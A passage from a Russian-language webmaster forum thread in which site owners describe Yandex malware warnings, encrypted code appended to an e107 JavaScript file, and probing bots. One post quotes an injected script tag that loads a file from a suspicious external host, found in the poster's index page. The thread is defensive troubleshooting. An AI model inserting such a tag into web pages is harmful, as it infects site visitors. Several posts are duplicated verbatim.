16. BON - 4 июля 2011 — 10:53 - перейти к сообщению
ну а что из бесплатного есть?
17. Jordan - 4 июля 2011 — 11:03 - перейти к сообщению
18. electron - 4 июля 2011 — 18:03 - перейти к сообщению
ну вот, перепроверил яндекс и снял "значек заразности" с моего сайта.
19. BON - 5 июля 2011 — 08:22 - перейти к сообщению
у меня после 3й перепроверки то же пропал значок заразности, и осещаеность сразу увеличилась на форуме (в сравнении когда висело предупреждении о заражении)
20. Minelab - 5 июля 2011 — 09:45 - перейти к сообщению
Прива всем. Так в чём была проблема? exploit нашли или это яшкины глюки были?
21. BON - 5 июля 2011 — 09:47 - перейти к сообщению
Minelab, у меня в одном из фаилов js в конце была какая то зашифрованная хня. Хотя сылался совсем на другую страницу
22. Minelab - 5 июля 2011 — 09:58 - перейти к сообщению
Спасибо. Сейчас перезалью файло.
(Добавление)
Бяка была в файле /e107_files/e107.js в самом низу.
Удачи!
(Добавление)
Бяка была в файле /e107_files/e107.js в самом низу.
Удачи!
23. BON - 5 июля 2011 — 13:47 - перейти к сообщению
Minelab, у меня точно так же.
24. саня - 26 декабря 2012 — 12:11 - перейти к сообщению
Сегодня на своём штмл сайте тоже обнаружил
Во чего было
и только на индексном файле.
Да и гад какой то постоянно долбит, ищет то папку вп-контент то папку юзеров, то ещё чего то пытается
Во чего было
CODE:
<script src="http://kinoshkaxa.changeip.name/rsize.js"></script>
и только на индексном файле.
Да и гад какой то постоянно долбит, ищет то папку вп-контент то папку юзеров, то ещё чего то пытается
CODE:
[Wed Dec 26 14:52:48 2012] [error] [client 176.214.141.242] script '/home/k/прпрпр/public_html/sport/index.php' not found or unable to stat, referer: http://сите.ru/index.php
25. BON - 26 декабря 2012 — 13:57 - перейти к сообщению
ну наверно бот лазает какой то
26. electron - 26 декабря 2012 — 14:38 - перейти к сообщению
саня , яндекс очень много нехорошего выдает по запросу "kinoshkaxa.changeip.name/rsize.js" . например , http://forum.hackersoft.ru/showt...0c23&p=87436 , по ходу дела ломанули ваш сайт , проверяйте комп хорошим антивирусом со свежими базами, возможно даже через вашего фтп-клиента сайт и заразился
27. саня - 26 декабря 2012 — 14:48 - перейти к сообщению
фтп через филезиллу, сейчас обновил до актуальной
пароль поменял на хостинге от панели, хотя пароли на компе не сохраняю
аваст не нашёл, касперский бесплатная утилита нашла три уязвимости, но как я понял они от денвера, потому что там чё то в пхп и мускулом он выдал что небольшой риск есть.
А так хрен знает что ещё делать будем смотреть что дальше будет.
Тут недавно вордпресс много ломали, сперва у иностранцев а потом и к нам добрались.
Что то, вроде, насколько помню на сайт заходишь а там хакед би хакед и усё....
пароль поменял на хостинге от панели, хотя пароли на компе не сохраняю
аваст не нашёл, касперский бесплатная утилита нашла три уязвимости, но как я понял они от денвера, потому что там чё то в пхп и мускулом он выдал что небольшой риск есть.
А так хрен знает что ещё делать будем смотреть что дальше будет.
Тут недавно вордпресс много ломали, сперва у иностранцев а потом и к нам добрались.
Что то, вроде, насколько помню на сайт заходишь а там хакед би хакед и усё....